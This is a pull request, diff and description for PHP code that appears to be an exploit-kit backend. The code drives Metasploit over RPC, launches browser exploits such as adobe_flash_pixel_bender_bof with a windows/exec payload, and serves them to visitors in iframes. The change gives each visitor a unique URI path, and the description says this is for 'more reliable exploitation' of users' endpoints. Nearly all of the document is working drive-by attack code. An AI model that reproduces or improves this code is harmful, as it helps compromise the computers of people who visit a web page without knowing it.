### PR TITLE
Changes to backend & php_msfrpc_inc

### DIFF
--- a/var/www/e/php_msfrpc_inc.php
+++ b/var/www/e/php_msfrpc_inc.php
@@ -264,7 +264,7 @@ function use_payload($ek_ip, $msf_payload, $msf_type, $msf_rhost, $msf_rport, $m
 }
 
 // ************ use_exploit() ************ //
-function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option, $msf_ssl = 0)
+function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option, $msf_uripath, $msf_ssl = 0)
 {    
     debug("START Function use_exploit()");
     debug("msgrpc_ip: " . $msgrpc_ip);
@@ -294,7 +294,7 @@ function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_fu
     $msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1 );
     debug("msf_exploit_name: " . $msf_exploit_name);
     
-    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set URIPATH /" . $msf_exploit_name);
+    $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set URIPATH /" . $msf_uripath);
     //$server_response = msf_console($ek_ip, $token, $console_id_one, "set SRVPORT 80");
     
     $server_response = msf_console($msgrpc_ip, $token, $console_id_one, "set SRVPORT " . $exploit_port);
@@ -332,11 +332,13 @@ function use_exploit($msgrpc_ip, $exploit_domain, $exploit_port, $msf_exploit_fu
     
     if($msf_ssl)
     {
-	$msf_url = 'https://' . $exploit_domain . '/' . $msf_exploit_name;
+	#$msf_url = 'https://' . $exploit_domain . '/' . $msf_exploit_name;
+        $msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
     }
     else
     {
-	$msf_url = 'http://' . $exploit_domain . '/' . $msf_exploit_name;
+	#$msf_url = 'http://' . $exploit_domain . '/' . $msf_exploit_name;
+        $msf_url = 'http://' . $exploit_domain . '/' . $msf_uripath;
     }
     
     debug("msf_url: " . $msf_url);

--- a/var/www/e/template-be.php
+++ b/var/www/e/template-be.php
@@ -51,13 +51,17 @@
       
       if (isset($throw_id))
       {
-        $load_file_path = '/var/www/'. RAND_STR . '-' . $throw_id;
-        $load_url = WL_URL . "/" .  RAND_STR . '-' . $throw_id;
+		  $load_file_path = '/var/www/'. $throw_id;
+		  $load_url = WL_URL . "/". $throw_id;
+        #$load_file_path = '/var/www/'. RAND_STR . '-' . $throw_id;
+        #$load_url = WL_URL . "/" .  RAND_STR . '-' . $throw_id;
       }
       else
       {
-        $load_file_path = '/var/www/'. RAND_STR . '-p';
-        $load_url = WL_URL . "/" . RAND_STR . '-p';
+		$load_file_path = '/var/www/PSp';
+		$load_url = WL_URL . "/Psp";
+        #$load_file_path = '/var/www/'. RAND_STR . '-p';
+        #$load_url = WL_URL . "/" . RAND_STR . '-p';
       }
       
       $load_file_data = "<?php define ('THROW_ID', '" . $throw_id . "'); ?>\n";
@@ -71,8 +75,12 @@
       debug("load_url: " . $load_url);
       $msf_cmd_option = $msf_cmd_option_one . $load_url . $msf_cmd_option_two;
       debug("msf_cmd_option: " . $msf_cmd_option);
-      
-      $msf_url = use_exploit(MSGRPC_IP, EXPLOIT_DOMAIN, EXPLOIT_PORT, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option);
+
+		$msf_exploit_name = substr(strrchr($msf_exploit_full_path, "/"), 1 );
+		#$msf_uripath = $hit_id . $msf_exploit_name;
+		$msf_uripath = $hit_id;
+
+      $msf_url = use_exploit(MSGRPC_IP, EXPLOIT_DOMAIN, EXPLOIT_PORT, $msf_exploit_full_path, $msf_target, $msf_payload_full_path, $msf_cmd_option, $msf_uripath);
       $innerReturn = $innerReturn . throw_iframe($msf_url);
       
       $GLOBALS['throw_count_be'] = $GLOBALS['throw_count_be'] + 1;
@@ -769,7 +777,8 @@
     else
     {
       // INSERT failed
-      $hit_id = NULL;
+      #$hit_id = NULL;
+		$hit_id = "unknown";
     }
     //mysqli_free_result($r);
     //mysqli_close($dbc);


### PR DESCRIPTION
I. [+] php_msfrpc_inc -> use_exploit() function can now accept an
uripath argument
II. [+] be -> passes hit_id or throw_id as the uripath argument to:
II. A. shorten the URL for more reliable exploitation
II. A. 1. sometimes the adobe_flash_pixel_bender_bof windows/exec
payload using the domain of example.io would be 2 characters short and
hence would pop a VBS window on the user’s endpoint due to the missing
“);” at the end of the window/exec rundll statement)
II. B. ensures the URI is always unique at each stage of the
exploitation proccess